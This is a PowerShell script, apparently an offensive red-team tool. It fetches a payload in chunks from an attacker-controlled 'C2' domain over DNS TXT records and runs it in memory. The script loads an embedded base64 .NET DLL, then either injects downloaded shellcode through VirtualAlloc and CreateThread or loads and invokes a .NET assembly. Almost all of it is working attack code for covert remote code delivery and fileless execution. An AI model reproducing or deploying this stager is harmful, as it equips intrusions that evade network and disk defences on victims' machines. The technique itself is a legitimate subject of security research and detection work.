Invoke-DNSDelivery.ps1

function Invoke-DNSDelivery
{
	<#
	.SYNOPSIS
	Receive a shellcode or a .Net assembly over DNS resolution channel, then load it into memory and execute it.
	DNS TXT records are being used as a means of transportation of data.
	
	This script requires its server side counterpart (dnsdelivery.py) to communicate with and actually deliver the payload data.
    
	The system's DNS server is used by default, but you can specify a specific one if required.
	The only mandatory parameter is the domain name to be used for DNS resolution. This is the domain name you own, on which you must run the specific DNS server script mentioned above.

	Function: Invoke-DNSDelivery
	Author: Arno0x0x, Twitter: @Arno0x0x

	.EXAMPLE
    # Using the system's default DNS server
	PS C:\> Invoke-DNSDelivery -DomainName mydomain.example.com

    # Using a specific DNS server
    PS C:\> Invoke-DNSDelivery -DomainName mydomain.example.com -DNSServer 192.168.52.134

	#>
	
	[CmdletBinding(DefaultParameterSetName="main")]
		Param (

    	[Parameter(Mandatory = $True)]
    	[ValidateNotNullOrEmpty()]
    	[String]$DomainName = $( Read-Host "Enter domain name: " ),

        [Parameter(Mandatory = $False)]
        [String]$DNSServer
    )
	
	#------------------------------------------------------------------------------------------------------
	# DNS TXT type resolution is such a pain in the ass in powershell IF you want it to run on both Win7, Win8.x and Win10.
	# From Win8.1 onwards, you can use the Resolve-DnsName cmdlet which perfeclty does the trick. But for Win7 ?
	# For Windows 7, one option is to call a command line subprocess like "cmd /c nslookup -type=TXT xxx.domain.com" and then parse the output,
	# which can be tricky if there's multiple TXT records returned, plus it's not performant and not very portable, prone to errors on other languages OS etc...
	# Oh well... I just created a .Net library (dnsResolver.cs) which call Win32 API native functions, I load it here, and there you go, it's a little bit heavy but works everywhere
	
	# Load the DNS resolver library
	$DnsResolverLib = [System.Convert]::FromBase64String("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OAFgAAgAPAE2AQgAQAE7AQgARAFAAQgASAFFAQgATAFKAQgAUAFPAQgAVAFUAQgAWAFZAQgAXAFeAQgAYAFjAQgAZAFoAQgAaAFtAQgAbAFyAQgAcAF3AQgAdAF8AQgAeAGBAQgAfAGGAQgAgAGLAQgAhAGQAQgAiAGVAQgAjAGaAQgAkAGfAQgAlAGkAQgAmAGpAQgAnAGuAQgAoAGzAQgApAGzAQgAqAG4AQgArAG9AQgAsAG9AScAywBHAC4AGwBAAi4AIwBJAsMAwwBHAAMAyAEEADwCCAAGAGgCIwIkCCACRQEDACsIAQBGAQUAnQABAASAAAAAAAAAAAAAAAAAAAAAAAUIAAAEAAAAAAAAAAAAAAABAG4AAAAAAAQAAAAAAAAAAAAAAAEAdwAAAAAAAwACAAQAAgAFAAIABgACAAcAAgAAAAA8TW9kdWxlPgBkbnNSZXNvbHZlci5kbGwARG5zUmVzb2x2ZXIARE5TRGVsaXZlcnkASVA0X0FSUkFZAE1YUmVjb3JkAFRYVFJlY29yZABEbnNRdWVyeU9wdGlvbnMARG5zUmVjb3JkVHlwZXMAbXNjb3JsaWIAU3lzdGVtAE9iamVjdABWYWx1ZVR5cGUARW51bQBEbnNRdWVyeQBEbnNSZWNvcmRMaXN0RnJlZQBHZXRUWFRSZWNvcmRzAC5jdG9yAEFkZHJDb3VudABBZGRyQXJyYXkAcE5leHQAcE5hbWUAd1R5cGUAd0RhdGFMZW5ndGgAZmxhZ3MAZHdUdGwAZHdSZXNlcnZlZABwTmFtZUV4Y2hhbmdlAHdQcmVmZXJlbmNlAFBhZABkd1N0cmluZ0NvdW50AHBTdHJpbmdBcnJheQB2YWx1ZV9fAEROU19RVUVSWV9TVEFOREFSRABETlNfUVVFUllfQUNDRVBUX1RSVU5DQVRFRF9SRVNQT05TRQBETlNfUVVFUllfVVNFX1RDUF9PTkxZAEROU19RVUVSWV9OT19SRUNVUlNJT04ARE5TX1FVRVJZX0JZUEFTU19DQUNIRQBETlNfUVVFUllfTk9fV0lSRV9RVUVSWQBETlNfUVVFUllfTk9fTE9DQUxfTkFNRQBETlNfUVVFUllfTk9fSE9TVFNfRklMRQBETlNfUVVFUllfTk9fTkVUQlQARE5TX1FVRVJZX1dJUkVfT05MWQBETlNfUVVFUllfUkVUVVJOX01FU1NBR0UARE5TX1FVRVJZX01VTFRJQ0FTVF9PTkxZAEROU19RVUVSWV9OT19NVUxUSUNBU1QARE5TX1FVRVJZX1RSRUFUX0FTX0ZRRE4ARE5TX1FVRVJZX0FERFJDT05GSUcARE5TX1FVRVJZX0RVQUxfQUREUgBETlNfUVVFUllfTVVMVElDQVNUX1dBSVQARE5TX1FVRVJZX01VTFRJQ0FTVF9WRVJJRlkARE5TX1FVRVJZX0RPTlRfUkVTRVRfVFRMX1ZBTFVFUwBETlNfUVVFUllfRElTQUJMRV9JRE5fRU5DT0RJTkcARE5TX1FVRVJZX0FQUEVORF9NVUxUSUxBQkVMAEROU19RVUVSWV9SRVNFUlZFRABETlNfVFlQRV9BAEROU19UWVBFX05TAEROU19UWVBFX01EAEROU19UWVBFX01GAEROU19UWVBFX0NOQU1FAEROU19UWVBFX1NPQQBETlNfVFlQRV9NQgBETlNfVFlQRV9NRwBETlNfVFlQRV9NUgBETlNfVFlQRV9OVUxMAEROU19UWVBFX1dLUwBETlNfVFlQRV9QVFIARE5TX1RZUEVfSElORk8ARE5TX1RZUEVfTUlORk8ARE5TX1RZUEVfTVgARE5TX1RZUEVfVEVYVABETlNfVFlQRV9UWFQARE5TX1RZUEVfUlAARE5TX1RZUEVfQUZTREIARE5TX1RZUEVfWDI1AEROU19UWVBFX0lTRE4ARE5TX1RZUEVfUlQARE5TX1RZUEVfTlNBUABETlNfVFlQRV9OU0FQUFRSAEROU19UWVBFX1NJRwBETlNfVFlQRV9LRVkARE5TX1RZUEVfUFgARE5TX1RZUEVfR1BPUwBETlNfVFlQRV9BQUFBAEROU19UWVBFX0xPQwBETlNfVFlQRV9OWFQARE5TX1RZUEVfRUlEAEROU19UWVBFX05JTUxPQwBETlNfVFlQRV9TUlYARE5TX1RZUEVfQVRNQQBETlNfVFlQRV9OQVBUUgBETlNfVFlQRV9LWABETlNfVFlQRV9DRVJUAEROU19UWVBFX0E2AEROU19UWVBFX0ROQU1FAEROU19UWVBFX1NJTksARE5TX1RZUEVfT1BUAEROU19UWVBFX0RTAEROU19UWVBFX1JSU0lHAEROU19UWVBFX05TRUMARE5TX1RZUEVfRE5TS0VZAEROU19UWVBFX0RIQ0lEAEROU19UWVBFX1VJTkZPAEROU19UWVBFX1VJRABETlNfVFlQRV9HSUQARE5TX1RZUEVfVU5TUEVDAEROU19UWVBFX0FERFJTAEROU19UWVBFX1RLRVkARE5TX1RZUEVfVFNJRwBETlNfVFlQRV9JWEZSAEROU19UWVBFX0FGWFIARE5TX1RZUEVfTUFJTEIARE5TX1RZUEVfTUFJTEEARE5TX1RZUEVfQUxMAEROU19UWVBFX0FOWQBETlNfVFlQRV9XSU5TAEROU19UWVBFX1dJTlNSAEROU19UWVBFX05CU1RBVABwc3pOYW1lAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBNYXJzaGFsQXNBdHRyaWJ1dGUAVW5tYW5hZ2VkVHlwZQBvcHRpb25zAGRuc1NlcnZlcklwQXJyYXkAcHBRdWVyeVJlc3VsdHMAcFJlc2VydmVkAHBSZWNvcmRMaXN0AEZyZWVUeXBlAGRvbWFpbgBzZXJ2ZXJJUABTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAFNlY3VyaXR5QWN0aW9uAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkbnNSZXNvbHZlcgBEbGxJbXBvcnRBdHRyaWJ1dGUAZG5zYXBpAERuc1F1ZXJ5X1cASW50UHRyAFplcm8AU3lzdGVtLk5ldABJUEFkZHJlc3MAUGFyc2UAR2V0QWRkcmVzc0J5dGVzAEJpdENvbnZlcnRlcgBUb1VJbnQzMgBVSW50MzIAQXJyYXkAU2V0VmFsdWUARW52aXJvbm1lbnQAT3BlcmF0aW5nU3lzdGVtAGdldF9PU1ZlcnNpb24AUGxhdGZvcm1JRABnZXRfUGxhdGZvcm0ATm90U3VwcG9ydGVkRXhjZXB0aW9uAFN5c3RlbS5Db2xsZWN0aW9ucwBBcnJheUxpc3QAU3lzdGVtLkNvbXBvbmVudE1vZGVsAFdpbjMyRXhjZXB0aW9uAFR5cGUAUnVudGltZVR5cGVI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ZABuAHMAUgBlAHMAbwBsAHYAZQByAC4AZABsAGwAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAwAAABANwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=")
	[System.Reflection.Assembly]::Load($DnsResolverLib) | Out-Null
	
	#------------------------------------------------------------------------------------------------------
	# Get data from the DNS server
	#------------------------------------------------------------------------------------------------------
	function Get-Data ([String]$Request)
	{
		$Response = New-Object -TypeName "System.Text.StringBuilder";
		$FQRequest = $Request + "." + $DomainName
		Write-Verbose "Sending request: $FQRequest to server [$DNSServer]"
		try {
			if ($DNSServer) {
				foreach ($TXTRecord in [DNSDelivery.DnsResolver]::GetTXTRecords($FQRequest, $DNSServer)) { $Response.Append($TXTRecord) | Out-Null }
			}
			else {
				foreach ($TXTRecord in [DNSDelivery.DnsResolver]::GetTXTRecords($FQRequest)) { $Response.Append($TXTRecord) | Out-Null }
			}
		}
		catch {
			Write-Verbose "[ERROR] Could not resolve $FQRequest, or could not contact DNS server"
			return $null
		}
		
		# Return the result
		$Response.ToString()
	}
	
	#------------------------------------------------------------------------------------------------------
	#Initialization step 
	# Contact the C2 over DNS channel, and ask what will be delivered:
	# - type of payload, can be a shellcode or a .Net assembly
	# - the number of chunks that constitute the payload
	
	# Contact the DNS C2 and perform initial request which is basically: "what do you have for me ?"
	$Init = Get-Data("init");
			
	if (!$Init) {
		# Error performing DNS request
		return
	}
	
	$Result = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($Init)).Split('|')
	$Type = $Result[0]
	$NbChunk = [int]$Result[1]
	Write-Verbose "Type: $Type | Nb of chunks: $NbChunk"
	
	#------------------------------------------------------------------------------------------------------
	# At this stage we know how much chunks of data should be downloaded
	# Let's download all chunks of data and merge them
	
	$EncodedPayload = New-Object -TypeName "System.Text.StringBuilder";
	$i = 0;
	
	while ($i -lt $NbChunk)
	{
		$Request = $i -as [string];
		$Response = Get-Data($Request);
		if ($Response)
		{
			Write-Verbose "Received chunk $i"
			$EncodedPayload.Append($Response) | Out-Null
			$i++
		}
	}
	Write-Verbose "Whole data received"
	
	#------------------------------------------------------------------------------------------------------
	# Convert base64 data received back to byte array
	$Data = [System.Convert]::FromBase64String($EncodedPayload.ToString())
	
	#------------------------------------------------------------------------------------------------------
	# The data received is a shellcode
	if ($Type -eq "shellcode")
	{
		Write-Verbose "Invoking shellcode"
		function Get-NativeMethodHandle {
			Param ($DLLName, $MethodName)		
			$SystemAssembly = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
			return $SystemAssembly.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($SystemAssembly.GetMethod('GetModuleHandle')).Invoke($null, @($DLLName)))), $MethodName))
		}

		function Get-DelegateType {
			Param (
				[Parameter(Position = 0, Mandatory = $True)] [Type[]] $Parameters,
				[Parameter(Position = 1)] [Type] $ReturnType = [Void]
			)

			$TypeBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
			$TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters).SetImplementationFlags('Runtime, Managed')
			$TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters).SetImplementationFlags('Runtime, Managed')
			return $TypeBuilder.CreateType()
		}

		$FuncAddr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((Get-NativeMethodHandle kernel32.dll VirtualAlloc), (Get-DelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $Data.Length,0x3000, 0x40)
		[System.Runtime.InteropServices.Marshal]::Copy($Data, 0, $FuncAddr, $Data.length)

		$ThreadHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((Get-NativeMethodHandle kernel32.dll CreateThread), (Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$FuncAddr,[IntPtr]::Zero,0,[IntPtr]::Zero)
		[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((Get-NativeMethodHandle kernel32.dll WaitForSingleObject), (Get-DelegateType @([IntPtr], [Int32]))).Invoke($ThreadHandle,0xffffffff) | Out-Null
	}
	
	#------------------------------------------------------------------------------------------------------
	# The data received is a .Net assembly
	elseif ($Type -eq "assembly")
	{
		Write-Verbose "Invoking .Net assembly"
		$Assembly = [System.Reflection.Assembly]::Load($Data)
		$Assembly.EntryPoint.Invoke($null, $null)
	}
}